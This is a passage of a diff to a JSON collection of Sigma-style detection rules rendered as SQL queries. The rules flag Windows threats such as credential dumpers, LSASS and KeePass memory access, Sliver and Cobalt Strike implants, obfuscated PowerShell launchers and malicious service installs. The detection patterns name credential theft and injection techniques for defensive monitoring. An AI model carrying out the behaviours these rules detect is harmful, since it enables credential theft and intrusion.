"attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" ], - "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" + "filename": "win_system_service_install_sliver.yml" }, { - "title": "Potential NetWire RAT Activity - Registry", - "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "title": "Credential Dumping Tools Service Execution - System", + "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "status": "experimental", - "description": "Detects registry keys related to NetWire RAT", - "author": "Christopher Peacock", + "description": "Detects well-known credential dumping tools execution via service execution events", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using credential dumping tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" ], - "filename": "registry_add_malware_netwire.yml" + "filename": "win_system_mal_creddumper.yml" }, { - "title": "Potential Persistence Via New AMSI Providers - Registry", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", + "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", "status": "experimental", - "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate security products adding their own AMSI providers. Filter these according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_amsi_providers.yml" + "filename": "win_system_invoke_obfuscation_via_var_services.yml" }, { - "title": "Potential Persistence Via Logon Scripts - Registry", - "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", - "status": "test", - "description": "Detects creation of UserInitMprLogonScript persistence method", - "author": "Tom Ueltschi (@c_APT_ure)", + "title": "Suspicious Service Installation Script", + "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "status": "experimental", + "description": "Detects suspicious service installation scripts", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.t1037.001", "attack.persistence", - "attack.lateral_movement" + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ - "Exclude legitimate logon scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" ], - "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" + "filename": "win_system_susp_service_installation_script.yml" }, { - "title": "Potential Ursnif Malware Activity - Registry", - "id": "21f17060-b282-4249-ade0-589ea3591558", - "status": "test", - "description": "Detects registry keys related to Ursnif malware.", - "author": "megan201296", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", + "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.execution", - "attack.t1112" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "registry_add_malware_ursnif.yml" + "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" }, { - "title": "Sysmon Configuration Modification", - "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", - "status": "test", - "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - System", + "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "sysmon_config_modification_status.yml" + "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" }, { - "title": "Sysmon Blocked Executable", - "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", - "status": "experimental", - "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "status": "test", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.g0064", + "attack.t1543.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE EventID = '27'" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" ], - "filename": "sysmon_file_block_exe.yml" + "filename": "win_system_apt_stonedrill.yml" }, { - "title": "Sysmon Process Hollowing Detection", - "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "title": "KrbRelayUp Service Installation", + "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "status": "experimental", - "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "author": "Sittikorn S, Tim Shelton", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055.012" - ], - "falsepositives": [ - "There are no known false positives at this time" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" - ], - "filename": "sysmon_process_hollowing.yml" - }, - { - "title": "Sysmon Configuration Error", - "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", - "status": "experimental", - "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", - "author": "frack113", - "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.t1543" ], "falsepositives": [ - "Legitimate administrative action" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" ], - "filename": "sysmon_config_modification_error.yml" + "filename": "win_system_krbrelayup_service_installation.yml" }, { - "title": "CobaltStrike Process Injection", - "id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", "status": "test", - "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", - "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.001" + "attack.persistence", + "attack.g0010", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", - "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "status": "test", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": "6c82cf5c-090d-4d57-9188-533577631108", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "status": "experimental", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", "attack.credential_access", - "attack.s0005", - "attack.t1003.001" + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ - "Antivirus products" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "author": "frack113", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "description": "Detects windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE 